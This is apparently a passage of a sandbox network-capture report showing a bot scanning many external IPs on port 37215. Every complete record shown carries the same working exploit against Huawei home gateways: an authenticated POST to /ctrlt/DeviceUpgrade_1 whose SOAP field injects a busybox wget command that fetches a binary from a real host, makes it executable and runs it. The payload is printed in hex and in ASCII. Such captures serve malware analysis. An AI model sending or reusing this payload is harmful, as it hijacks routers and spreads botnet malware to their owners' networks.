                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            584192.168.2.155212841.163.189.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159526110 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            585192.168.2.154563641.135.253.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159584999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            586192.168.2.155625441.169.154.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159611940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            587192.168.2.155063041.146.91.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159611940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            588192.168.2.155658041.143.182.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159629107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            589192.168.2.154363641.15.37.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159629107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            590192.168.2.155556041.54.230.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159636974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            591192.168.2.153537041.155.179.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159661055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            592192.168.2.156053641.42.12.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159668922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            593192.168.2.154312641.238.15.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159698009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
